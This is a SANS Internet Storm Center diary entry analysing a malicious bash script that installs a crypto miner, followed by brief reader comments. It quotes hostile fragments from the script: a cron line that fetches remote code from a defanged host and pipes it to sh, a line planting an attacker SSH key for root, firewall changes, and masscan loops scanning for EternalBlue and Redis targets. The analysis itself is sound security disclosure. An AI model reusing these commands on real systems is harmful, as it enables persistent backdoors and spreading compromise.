Threat Level: green Handler on Duty: Jan Kopriva

SANS ISC: Malicious Bash Script with Multiple Features - SANS Internet Storm Center SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Malicious Bash Script with Multiple Features

It’s not common to find a complex malicious bash script. Usually, bash scripts are used to download a malicious executable and start it. This one has been spotted by @michalmalik[1] who twitted about it. I had a quick look at it. The script has currently a score of 13/50 on VT[2]. First of all, the script installs some tools and dependencies. 'apt-get' and 'yum'  are used, this means that multiple Linux distributions are targeted. The following packages are installed: wget, git, make, python, redis-tools, gcc, build-essentials. Some Python packages are installed via PIP.

The primary goal of the script is to install a crypto miner. To optimize performances, the number of CPUs is tested:

if [ $cpunum -gt 4 ];
threads=`expr $cpunum / 2`

Three first files are downloaded:


'clay' is a known trojan[3]. 'minerd' is, as the name says, a crypto miner[4]. This is an x64 binary. 'glib-2.14.tar.gz' (SHA256: 18d9a0296260fd9529d59229c1dcb130ee8a18a1dd71c23712c39056cc0eb0b3) contains the libraries required by minerd. The crypto miner uses stratum+tcp://

Then crontab entries are added for persistence:

echo "*/5 * * * * curl -fsSL hxxp://xksqu4mj.fri3nds[.]in/tools/ | sh" > /var/spool/cron/root

The nasty stuff is the installation of the attack SSH key:

echo "ssh-rsa AAAAB3N ...[redacted]... Mq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys

I don't know why they add a key for the root user. By default, ssh does not allow root login. They should create a new user and add it to the 'sudo' group!

Then, Redis via port TCP/6379 (see below why):

PS3=$(iptables -L | grep 6379 | wc -l)
if [ $PS3 -eq 0 ];
yum -y install iptables-services
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
iptables -I INPUT 1 -p tcp --dport 6379 -s -j ACCEPT
service iptables save
/etc/init.d/iptables-persistent save

The next step is to download the 'masscan' port scanner and another bunch of scripts:


The tar file contains scripts which generate ranges of IP addresses and scan for EternalBlue[4] vulnerable hosts (Windows hosts):

while read line
    masscan -p445 $line --rate=20000 | tee -a masscan
done < ip

For Linux hosts, Redis vulnerable instances are targeted:

while read line
    masscan -p6379 $line --rate=20000 | tee -a masscan
done < ip

The goal is to find new vulnerable hosts, pivot (lateral movement) and deploy the same script.

As a final note, some attackers are able to write "nice" (read: malicious code) but they still fail to protect their resources. All their material is available via directory indexing:

Credit to finding the script goes to Michal Malik[6].


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

I will be teaching next: Reverse-Engineering Malware: Malware Analysis Tools and Techniques - SANS Amsterdam August 2022


697 Posts
ISC Handler
Mar 5th 2018
Is "ython" something or is there actually a missing "p" in one of those scripts? Makes you wonder how it happened...

23 Posts
It's a typo (probably when I copy/paste the code and formated it to fit in the diary)

697 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!